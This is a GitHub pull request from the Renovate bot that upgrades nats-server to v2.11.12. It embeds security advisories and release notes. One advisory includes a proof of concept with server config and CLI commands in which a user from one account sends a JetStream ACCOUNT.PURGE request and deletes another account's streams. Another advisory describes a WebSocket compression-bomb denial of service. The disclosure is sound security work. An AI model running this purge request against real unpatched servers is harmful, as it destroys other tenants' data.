Skip to content

test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security]#76

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability
Open

test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security]#76
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Apr 15, 2025

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
github.com/nats-io/nats-server/v2 v2.10.17v2.11.12 age confidence

GitHub Vulnerability Alerts

CVE-2025-30215

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27

Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.

Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact

Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of Jetstream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from Jetstream clusters.

Risk: Loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.

PoC

Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps

$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).

# According to the source comments, user b shouldn't even be able to purge it's own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined

CVE-2026-27571

Impact

The WebSockets handling of NATS messages handles compressed messages via the WebSockets negotiated compression. The implementation bound the memory size of a NATS message but did not independently bound the memory consumption of the memory stream when constructing a NATS message which might then fail validation for size reasons.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix was to bounds the decompression to fail once the message was too large, instead of continuing on.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been, this was an oversight. Per the NATS security policy, because this does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points.

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.11.12

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nkeys v0.4.12 (#​7578)
  • github.com/antithesishq/antithesis-sdk-go v0.5.0-default-no-op (#​7604)
  • github.com/klauspost/compress v1.18.3 (#​7736)
  • golang.org/x/crypto v0.47.0 (#​7736)
  • golang.org/x/sys v0.40.0 (#​7736)
  • github.com/google/go-tpm v0.9.8 (#​7696)
  • github.com/nats-io/nats.go v1.48.0 (#​7696)
Added

General

  • Added WebSocket-specific ping interval configuration with ping_internal in the websocket block (#​7614)

Monitoring

  • Added tls_cert_not_after to the varz monitoring endpoint for showing when TLS certificates are due to expire (#​7709)
Improved

JetStream

  • The scan for the last sourced message sequence when setting up a subject-filtered source is now considerably faster (#​7553)
  • Consumer interest checks on interest-based streams are now significantly faster when there are large gaps in interest (#​7656)
  • Creating consumer file stores no longer contends on the stream lock, improving consumer create performance on heavily loaded streams (#​7700)
  • Recalculating num pending with updated filter subjects no longer gathers and sorts the subject filter list twice (#​7772)
  • Switching to interest-based retention will now remove no-interest messages from the head of the stream (#​7766)

MQTT

  • Retained messages will now work correctly even when sourced from a different account and has a subject transform (#​7636)
Fixed

General

  • WebSocket connections will now correctly limit the buffer size during decompression (#​7625, thanks to Pavel Kokout at Aisle Research)
  • The config parser now correctly detects and errors on self-referencing environment variables (#​7737)
  • Internal functions for handling headers should no longer corrupt message bodies if appended (#​7752)

JetStream

  • A protocol error caused by an invalid transform of acknowledgement reply subjects when originating from a gateway connection has been fixed (#​7579)
  • The meta layer will now only respond to peer remove requests after quorum has been reached (#​7581)
  • Invalid subject filters containing non-terminating full wildcard no longer produce unexpected matches (#​7585)
  • A data race when creating a stream in clustered mode has been fixed (#​7586)
  • A panic when processing snapshots with missing nodes or assignments has been fixed (#​7588)
  • When purging whole message blocks, the subject tracking and scheduled messages are now updated correctly (#​7593)
  • The filestore will no longer unexpectedly lose writes when AsyncFlush is enabled after a process pause (#​7594)
  • The filestore now will process message removal on disk before updating accounting, which improves error handling (#​7595, #​7601)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • A data race has been fixed in the stream health check (#​7619)
  • Tombstones are now correctly written for recovering the sequences after compacting or purging an almost-empty stream to seq 2 (#​7627)
  • Combining skip sequences and compactions will no longer overwrite the block at the wrong offset, correcting a corrupt record state error (#​7627)
  • Compactions that reclaim over half of the available space now use an atomic write to avoid losing messages if killed (#​7627)
  • Filestore compaction should no longer result in no idx present cache errors (#​7634)
  • Filestore compaction now correctly adjusts the high and low sequences for a message block, as well as cleaning up the deletion map accordingly (#​7634)
  • Potential stream desyncs that could happen during stream snapshotting have been fixed (#​7655)
  • Raft will no longer allow multiple membership changes to take place concurrently (#​7565, #​7609)
  • Raft will no longer count responses from peer-removed nodes towards quorum (#​7589)
  • Raft quorum counting has been refactored so the implicit leader ack is now only counted if still a part of the membership (#​7600)
  • Raft now writes the peer state immediately when handling a peer-remove to ensure the removed peers cannot unexpectedly reappear after a restart (#​7602)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • Add peer operations to Raft can no longer result in disjoint majorities (#​7632)
  • Raft groups should no longer readmit a previously removed peer if a heartbeat occurs between the peer removal and the leadership transfer (#​7649)
  • Raft single node elections now transition into leader state correctly (#​7642)
  • R1 streams will no longer incorrectly drift last sequence when exceeding limits (#​7658)
  • Deleted streams are no longer wrongfully revived if stalled on an upper-layer catchup (#​7668)
  • A panic that could happen when receiving a shutdown signal while JetStream is still starting up has been fixed (#​7683)
  • JetStream usage stats now correctly reflect purged whole blocks when optimising large purges (#​7685)
  • Recovering JetStream encryption keys now happens independently of the stream index recovery, fixing some cases where the key could be reset unexpectedly if the index is rebuilt (#​7678)
  • Non-replicated file-based consumers now detect corrupted state on disk and are deleted automatically (#​7691)
  • Raft no longer allows a repeat vote for the same term after a stepdown or leadership transfer (#​7698)
  • Replicated consumers are no longer incorrectly deleted if they become leader just as JetStream is about to shut down (#​7699)
  • Fixed an issue where a single truncated block could prevent storing new messages in the filestore (#​7704)
  • Fixed a concurrent map iteration/write panic that could occur on WorkQueue streams during partitioning (#​7708)
  • Fixed a deadlock that could occur on shutdown when adding streams (#​7710)
  • A data race on mirror consumers has been fixed (#​7716)
  • JetStream no longer leaks subscriptions in a cluster when a stream import/export is set up that overlaps the $JS.> namespace (#​7720)
  • The filestore will no longer waste CPU time rebuilding subject state for WALs (#​7721)
  • Configuring cluster_traffic in config mode has been fixed (#​7723)
  • Subject intersection no longer misses certain subjects with specific patterns of overlapping filters, which could affect consumers, num pending calculations etc (#​7728, #​7741, #​7744, #​7745)
  • Multi-filtered next message lookups in the filestore can now skip blocks when faster to do so (#​7750)
  • The binary search for start times now handles deleted messages correctly (#​7751)
  • Consumer updates will now only recalculate num pending when the filter subjects are changed (#​7753)
  • Consumers on replicated interest or workqueue streams should no longer lose interest or cause desyncs after having their filter subjects updated (#​7773)
  • Interest-based streams will no longer start more check interest state goroutines when there are existing running ones (#​7769)

MQTT

  • The maximum payload size is now correctly enforced for MQTT clients (#​7555, thanks to @​yixianOu)
  • Fixed a panic that could occur when reloading config if the user did not have permission to access retained messages (#​7596)
  • Fixed account mapping for JetStream API requests when traversing non-JetStream-enabled servers (#​7598)
  • QoS0 messages are now mapped correctly across account imports/exports with subject mappings (#​7605)
  • Loading retained messages no longer fails after restarting due to last sequence checks (#​7616)
  • A bug which could corrupt retained messages in clustered deployments has been fixed (#​7622)
  • Permissions to $MQTT. subscriptions are now handled implicitly, with the exception of deny ACLs which still permit restriction (#​7637)
  • A bug where QoS2 messages could not be retrieved after a server restart has been fixed (#​7643)
Complete Changes

v2.11.11

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

JetStream

  • Added meta_compact and meta_compact_size, advanced JetStream config options to control how many log entries must be present in the metalayer log before snapshotting and compaction takes place (#​7484, #​7521)
  • Added write_timeout option for clients, routes, gateways and leafnodes which controls the behaviour on reaching the write_deadline, values can be default, retry or close (#​7513)

Monitoring

  • Meta cluster snapshot statistics have been added to the /jsz endpoint (#​7524)
  • The /jsz endpoint can now show direct consumers with the direct-consumers?true flag (#​7543)
Improved

General

  • Binary stream snapshots are now preferred by default for nodes on new route connections (#​7479)
  • Reduced allocations in the sublist and subject transforms (#​7519)

JetStream

  • Improved the logging for observer mode (#​7433)
  • Improved the performance of enforcing max_bytes and max_msgs limits (#​7455)
  • Streams and consumers will no longer unnecessarily snapshot when being removed or scaling down (#​7495)
  • Streams are now loaded in parallel when enabling JetStream, often reducing the time it takes to start up the server (#​7482)
  • Stream catchups will now use delete ranges more aggressively, speeding up catchups of large streams with many interior deletes (#​7512)
  • Streams with subject transforms can now implicitly republish based on those transforms by configuring > for both republish source and destination (#​7515)
  • A race condition where subscriptions may not be set up before catchup requests are sent after a leader change has been fixed (#​7518)
  • JetStream recovery parallelism now matches the I/O gated semaphore (#​7526)
  • Reduced heap allocations in hash checks (#​7539)
  • Healthchecks now correctly report when streams are catching up, instead of showing them as unhealthy (#​7535)
  • Improve interest detection when consumers are created or deleted across different servers (#​7440)

Monitoring

  • The jsz monitoring endpoint can now report leader counts (#​7429)
Fixed

General

  • When using message tracing, header corruption when setting the hop header has been fixed (#​7443)
  • Shutting down a server using lame-duck mode should no longer result in max connection exceeded errors (#​7527)

JetStream

  • Race conditions and potential panics fixed in the handling of some JetStream API handlers (#​7380)
  • The filestore no longer loses tombstones when using secure erase (#​7384)
  • The filestore no longer loses the last sequence when recovering blocks containing only tombstones (#​7384)
  • The filestore now correctly cleans up empty blocks when selecting the next first block (#​7384)
  • The filestore now correctly obeys sync_always for writing TTL and scheduling state files (#​7385)
  • Fixed a data race on a wait group when mirroring streams (#​7395)
  • Skipped message sequences are now checked for ordering before apply, fixing a potential stream desync on catchups (#​7400)
  • Skipped message sequences now correctly detect gaps from erased message slots, fixing potential cache issues, slow reads and issues with catchups (#​7399, #​7401)
  • Raft groups now report peer activity more consistently, fixing some cases where asset info and monitoring endpoints may report misleading values after leader changes (#​7402)
  • Raft groups will no longer permit truncations from unexpected catchup entries if the catchup is completed (#​7424)
  • The filestore will now correctly release locks when erasing messages returns an error (#​7431)
  • Caches will now no longer expire unnecessarily when re-reading the same sequences multiple times in first-matching code paths (#​7435)
  • A couple of issues related to header handling have been fixed (#​7465)
  • No-wait requests now return a 400 No Messages response correctly if the stream is empty (#​7466)
  • Raft groups will now only report leadership status after a no-op entry on recovery (#​7460)
  • Fixed a race condition in the filestore that could happen between storing messages and shutting down (#​7496)
  • A panic that could occur when recovering streams in parallel has been fixed (#​7503)
  • An off-by-one when detecting holes at the end of a filestore block has been fixed (#​7508)
  • Writing skip message records in the filestore no longer releases and reacquires the lock unnecessarily (#​7508)
  • Fixed a bug on metalayer recovery where stream and consumer monitor goroutines for recreated assets would run with the wrong Raft group (#​7510)
  • Scaling up an asset from R1 now results in an installed snapshot, allowing recovery after restart if interrupted, avoiding a potential desync (#​7509)
  • Raft groups should no longer report no quorum incorrectly when shutting down (#​7522)
  • Consumers that existed in a metalayer snapshot but were deleted on recovery will no longer result in failing healthchecks (#​7523)
  • An off-by-one when detecting holes at the end of a filestore block has been fixed (#​7525)
  • Fixed a race condition that could happen with shutdown signals when shutting down JetStream (#​7536)
  • Fixed a deadlock that could occur when purging a stream with mismatched consumer state (#​7546)
Complete Changes

v2.11.10

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.24.7
Dependencies
  • golang.org/x/crypto v0.42.0 (#​7320)
  • github.com/google/go-tpm v0.9.6 (#​7376)
  • github.com/nats-io/nats.go v1.46.1 (#​7377)
Improved

General

  • Statistics for gateways, routes and leaf connections are now correctly omitted from accstatsz responses if empty (#​7300)

JetStream

  • Stream assignment check has been simplified (#​7290)
  • Additional guards prevent panics when loading corrupted messages from the filestore (#​7299)
  • The store lock is no longer held while searching for TTL expiry tasks, improving performance (#​7344)
  • Removing a message from the TTL state is now faster (#​7344)
  • The filestore no longer performs heap allocations for hash checks (#​7345)
  • Meta snapshot performance for a very large number of assets has been improved after a regression in v2.11.9 (#​7350)
  • Sequence-from-timestamp lookups, such as those using opt_start_time on consumers or start_time on message get requests, now use a binary search for improved lookup performance (#​7357)
  • JetStream API requests are always handled from the worker pool, improving the semantics of the API request queue and logging when requests take too long (#​7125)
  • JetStream will no longer perform a metalayer snapshot on every stream removal request, reducing API pauses and improving meta performance (#​7373)
Fixed

General

  • Fixed the exit code when receiving a SIGTERM signal immediately after startup (#​7367)

JetStream

  • Fixed a use-after-free bug and a buffer reclamation issue in the filestore flusher (#​7295)
  • Direct get requests now correctly skip over deleted messages if the starting sequence is itself deleted (#​7291)
  • The Raft layer now strictly enforces that non-leaders cannot send append entries (#​7297)
  • The filestore now correctly handles recovering filestore blocks with out-of-order sequences from disk corruption (#​7303, #​7304)
  • The filestore now produces more useful error messages when disk corruption is detected (#​7305)
  • Removed messages with a per-message TTL are now removed from the TTL state immediately (#​7344)
  • Fixed a bug where TTL state was recovered on startup with subject delete markers enabled, that message expiry would not start as expected (#​7344)
  • Expiring messages from the filestore no longer leaks timers and expires at the correct time (#​7344)
  • Deleting a non-existent sequence on a stream no longer results in a cluster reset and leadership election (#​7348)
  • Subject tree intersection now correctly handles overlapping literals and partial wildcards, i.e. stream.A and stream.*.A, fixing some consumer or message get filters (#​7349)
  • A data race when checking all JetStream limits has been fixed (#​7356)
  • Raft will no longer trigger a reset of the clustered state due to a stream snapshot timeout (#​7293)
Complete Changes

v2.11.9

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Improved

JetStream

  • Offline assets support (#​7158)
    • Server version 2.12 will introduce new features that would otherwise break a 2.11 server after a downgrade. The server now reports the streams/consumers as offline and unsupported, keeping the data safe, but allowing to either delete the asset or upgrade back to the supported version without changes to the data itself.
  • The raftz endpoint now reports the cluster traffic account (#​7186)
  • The stream info and consumer info endpoints now return leader_since (#​7189)
  • The stream info and consumer info endpoints now return system_account and traffic_account (#​7193)
  • The jsz monitoring endpoint now returns system_account and traffic_account (#​7193)
Fixed

General

  • Fix a panic that could happen at startup if building from source using non-Git version control (#​7178)
  • Fix an issue where issuing an account JWT update with a connection limit could cause older clients to be disconnected instead of newer ones (#​7181, #​7185)
  • Route connections with invalid credentials will no longer rapidly reconnect (#​7200)
  • Allow a default_sentinel JWT from a scoped signing key instead of requiring it to solely be a bearer token for auth callout (#​7217)
  • Subject interest would not always be propagated for leaf nodes when daisy chaining imports/exports (#​7255)
  • Subject interest would sometimes be lost if the leaf node is a spoke (#​7259)
  • Lowering the max connections limit should no longer result in streams losing interest (#​7258)

JetStream

  • The Nats-TTL header will now be correct if the subject delete marker TTL overwrites it (#​7177)
  • In operator mode, the cluster_traffic state for an account is now restored correctly when enabling JetStream at startup (#​7191)
  • A potential data race during a consumer create or update when reading its paused state has been fixed (#​7201)
  • A race condition that could allow creating a consumer with more replicas than the stream has been fixed (#​7202)
  • A race condition that could allow creating the same stream with different configurations has been fixed (#​7210, #​7212)
  • Raft will now correctly reject delayed entries from an old leader when catching up in the meantime (#​7209, #​7239)
  • Raft will now also limit the amount of cached in-memory entries as the leader, avoiding excessive memory usage (#​7233)
  • A potential race condition delaying shutdown if a stream/consumer monitor goroutine was not started (#​7211)
  • A benign underflow when using an infinite (-1) MaxDeliver for consumers (#​7216)
  • A potential panic to send a leader elected advisory when shutting down before completing startup (#​7246)
  • Stopping a stream should no longer wait indefinitely if the consumer monitor goroutine wasn’t stopped (#​7249)
  • Speed up stream mirroring and sourcing after a leaf node reconnects in complex topologies (#​7265)
  • Updating a stream with an empty placement will no longer incorrectly trigger a stream move (#​7222)

Tests

Complete Changes

v2.11.8

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

General

  • Community-contributed support for building on Solaris and Illumos (#​7122, thanks to @​jwntree)
Fixed

General

  • String-to-integer parsing has been improved in various places to prevent overflows/underflows (#​7145)

JetStream

  • Fixed an incorrectly formatted log line when failing to load a block when recovering TTLs (#​7150)
  • Raft will now step down if a higher term is detected during a catchup (#​7151)
  • Raft will now more reliably ignore entries from previous/cancelled catchups that arrive late (#​7151)
  • Fix a potential panic that could happen by a division by zero when applying Raft entries (#​7151)
  • The healthcheck endpoint should no longer report transient errors for newly created or recently deleted consumers (#​7154)
  • Fix a potential panic when trying to truncate a filestore block that doesn't exist (#​7162)
  • Clean up stale index.db file when truncating so that it is not inconsistent if the truncate operation is interrupted (#​7162)
  • Fix an off-by-one problem when Raft truncates to the correct index at startup (#​7162)
  • Ephemeral consumers will always select an online server when created on a replicated stream (#​7165)

Tests

Complete Changes

v2.11.7

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

General

  • The SubjectMatchesFilter function is now available as an exported function for embedded use (#​7051)
  • The leafz monitoring endpoint now includes the connection ID (#​7063)
  • The monitoring endpoint index page now includes the endpoint names on hover (#​7066, #​7087)
Improved

JetStream

  • Consumers with inactivity thresholds should no longer age out before processing acks (#​7107)
  • The Raft layer will no longer request store state on each apply (#​7109)
  • Tombstones in Raft log compactions will now be written asynchronously, similar to purges (#​7109)
  • When enabling per-message TTLs on a stream, existing messages with the Nats-TTL header are now scanned and processed (#​7117)
Fixed

General

  • Message header lookups with common prefixes will now return correctly in all cases, fixing a problem where the headers could be sensitive to ordering (#​7065)
  • Validate that the default_sentinel JWT is a bearer token for auth callout (7074)
  • The $SYS.REQ.USER.INFO endpoint should now only be answered by the local server, fixing cases where the endpoint may sometimes return without full connection details (#​7089)

JetStream

  • The Raft layer will require recovery and snapshot handling at startup before campaigning for a leadership election, fixing a situation where a node could continue with an outdated stream (#​7040)
  • The Raft log will no longer be compacted until after a snapshot is written, improving crash resilience (#​7043)
  • A race condition when shutting down Raft nodes which could result in no snapshot being written has been fixed (#​7045)
  • Consumer pull requests that use no_wait or expires behaviour has been fixed with replicated consumers (#​7046)
  • Pull consumers with an inactive threshold will now consider pending acks when determining inactivity, preventing the consumer from being deleted while messages are being processed (#​7052)
  • Push consumers will now correctly error when trying to configure priority groups (#​7053)
  • Committed entry objects will now be correctly returned to the pool on error, reducing allocations (#​7064)
  • The time hash wheel used for per-message TTLs now correctly detects and expires messages with TTLs over an hour, previously it could take double the expected time (#​7070)
  • A potential panic when selecting message blocks during TTL recovery has been fixed (#​7072)
  • A KV purge operation with subject delete markers configured will no longer leave behind a redundant extra delete marker (#​7026)
  • Raft will now correctly attempt to truncate back to a snapshot if applies were not caught up instead of resetting the entire log (#​7095)
  • Store cipher conversion will now work correctly when combined with store compression (#​7099)
  • Truncate and erase operations in the filestore should now be consistent after a hard kill (#​7100)
  • When a filestore message block is deleted and an unclean shutdown results in a stale index.db, the deleted blocks are now correctly marked as lost data and the index is rebuilt (#​7123)
  • Fixed a potential underflow that could happen when modifying max_bytes reservations (#​7131)

Tests

Complete Changes

v2.11.6

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.24.4
Improved

JetStream

  • Sources will no longer update their last seen timestamp when stalled, making it clearer how long it has been since the last contact (#​7013)
  • Overall consumer performance has been improved by reducing allocations and improving the num pending calculation (#​7022)
Fixed

General

  • The subsz monitoring endpoint now returns the correct total for subscription details, aligning behaviour with other endpoints for pagination (#​7009)

JetStream

  • Fixed a bug where filestore encryption could corrupt a message block if a write took place before a read after restarting the server (#​7008)
  • Fixed a performance regression introduced in v2.11.0 which could result in abnormally low throughput from filtered consumers and higher GC pressure (#​7015)
  • Healthchecks will no longer produce unexpected monitor goroutine warnings when a clustered stream is restored from a snapshot (#​7019)
  • A race condition that could result in removed streams incorrectly reappearing has been fixed (#​7025)
  • The reserved_memory and reserved_storage statistics will no longer underflow when no limits are set (#​7024)
Complete Changes

v2.11.5

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nats.go v1.43.0 (#​6956)
  • golang.org/x/crypto v0.39.0 (#​6956)
  • golang.org/x/time v0.12.0 (#​6956)
Improved

General

  • The connz monitoring endpoint now includes leafnode connections (#​6949)
  • The accstatsz monitoring endpoint now contains leafnode, route and gateway connection stats (#​6967)

JetStream

  • Sourcing and mirroring should now resync more quickly when sourcing over leafnodes after a connection failure (#​6981)
  • Reduced lock contention when reporting stream ingest warnings (#​6934)
  • Log lines for resetting Raft WAL state have been clarified (#​6938)
  • Determining if acks are required in interest-based streams has been optimised with fewer memory allocations (#​6990)
  • Ephemeral R1 consumers will no longer log new consumer leader on clustered setups, reducing log noise when watchers etc are in use (#​7003)
Fixed

General

  • Leafnodes with restrictive permissions can now route replies correctly when the message originates from a supercluster (#​6931)
  • Memory usage is now reported correctly on Linux systems with huge pages enabled (#​7006)

JetStream

  • Updating the AllowMsgTTL setting on a stream will now take effect correctly (#​6922)
  • A potential deadlock when purging stream consumers has been fixed (#​6933)
  • A race condition that could prevent stream snapshots on shutdown has been fixed ([#​6942](https://redirect.github.com/nats

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Contributor Author

renovate bot commented Apr 15, 2025

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.23.0
github.com/nats-io/nats.go v1.36.0 -> v1.39.1
github.com/klauspost/compress v1.17.9 -> v1.18.0
github.com/minio/highwayhash v1.0.2 -> v1.0.3
github.com/nats-io/jwt/v2 v2.5.7 -> v2.7.3
github.com/nats-io/nkeys v0.4.7 -> v0.4.10
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.34.0
golang.org/x/sys v0.21.0 -> v0.30.0
golang.org/x/text v0.16.0 -> v0.22.0
golang.org/x/time v0.5.0 -> v0.10.0

@codecov
Copy link

codecov bot commented Apr 15, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 54.81%. Comparing base (3cf2082) to head (2765e0c).

Additional details and impacted files
@@           Coverage Diff           @@
##             main      #76   +/-   ##
=======================================
  Coverage   54.81%   54.81%           
=======================================
  Files          25       25           
  Lines        1609     1609           
=======================================
  Hits          882      882           
  Misses        630      630           
  Partials       97       97           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 Compare May 7, 2025 11:02
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc Compare August 10, 2025 14:04
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 Compare October 9, 2025 09:53
@renovate
Copy link
Contributor Author

renovate bot commented Dec 15, 2025

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 12 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.24.0
github.com/nats-io/nats.go v1.36.0 -> v1.48.0
github.com/klauspost/compress v1.17.9 -> v1.18.3
github.com/minio/highwayhash v1.0.2 -> v1.0.4-0.20251030100505-070ab1a87a76
github.com/nats-io/jwt/v2 v2.5.7 -> v2.8.0
github.com/nats-io/nkeys v0.4.7 -> v0.4.12
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.47.0
golang.org/x/net v0.26.0 -> v0.48.0
golang.org/x/sys v0.21.0 -> v0.40.0
golang.org/x/text v0.16.0 -> v0.33.0
golang.org/x/time v0.5.0 -> v0.14.0
golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d -> v0.40.0

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 69e2624 to 2765e0c Compare February 24, 2026 19:44
